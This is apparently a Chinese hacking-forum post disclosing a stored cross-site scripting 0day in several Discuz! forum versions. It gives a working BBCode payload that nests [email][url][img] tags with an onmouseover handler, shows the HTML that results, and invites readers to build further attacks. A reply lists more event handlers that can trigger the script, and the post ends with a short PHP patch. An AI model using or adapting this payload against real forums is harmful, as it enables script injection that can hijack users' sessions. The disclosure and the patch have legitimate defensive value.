第一个报告的地方是http://www.wooyun.org/bugs/wooyun-2010-02299
第二个我公布在本论坛(t00ls-bbs)
另外说一下t00ls本论坛也存在此漏洞,但是我用人格保证,从没用此漏洞攻击过t00ls论坛。
发布出来只是想认识更多研究技术和热爱技术的人一起交流,共同进步。
我希望先t00ls本论坛内部交流,先别外放!!!DZ官方正在修改此问题。
(管理员能否象征性的给点分或是什么的谢谢了)

注:我希望转载的时候能注明作者。wooyun发布作者和本论坛ID是一个人,如果有什么问题请短信。

简要描述:

2009年一次偶然间测试发现的此XSS漏洞,因为是存储型的,我想大家应该知道它的危害吧。相隔这么多年DZ不断的更新版本,但此漏洞依然存在,今天就发布出来吧!留着也没什么用会长毛的,呵呵。
在此我要感谢一下我的好朋友Jackal在09年的时候一起帮我测试漏洞的。
当时我们一起测试的是DZ6.0-DZ7.2,不知道是不是通杀啊。哈哈!没有一个一个去测试。有条件的去测试一下吧。
详细说明:

发贴进入源码模式,写入如下的exp

以下是引用片段:

[email][url][img]http://qhkest.com onmouseover=alert(/DZ-xss-0day/); [/img] [/url][/email]

上面代码是以鼠标事件来触发XSS的,剩下的大家可以自行发挥构造!!!

附上XSS完的源码如下:

以下是引用片段:

<a href="mailto:"></a><a href="%5C%22http://qhkest.com" onmouseover="alert(/DZ-xss-0day/);" \"="" target="\&quot;_blank\&quot;"><img src="http://qhkest.com%20onmouseover=alert%28/DZ-xss-0day/%29;" onload="thumbImg(this)" alt=""> </a><

我想你们一看就明白了吧!!!
漏洞证明:

本地测试结果:
Discuz! X2

Discuz!多版本 存储型 XSS 脚本漏洞 (0day)

修复方案:

你们懂得,此漏洞很简单。

不过还是赞下楼主,思路不错。不过a标签支持的on事情莫过于:onfocus, onblur, onclick, ondblclick, onmousedown, onmouseup, onmouseover, onmousemove, onmouseout, onkeypress, onkeydown, onkeyup

修复方法:

1. 查找代码: function parseemail($email, $text) {
2. 在后面增加一行代码:
   $text = str_replace('\"', '"', $text);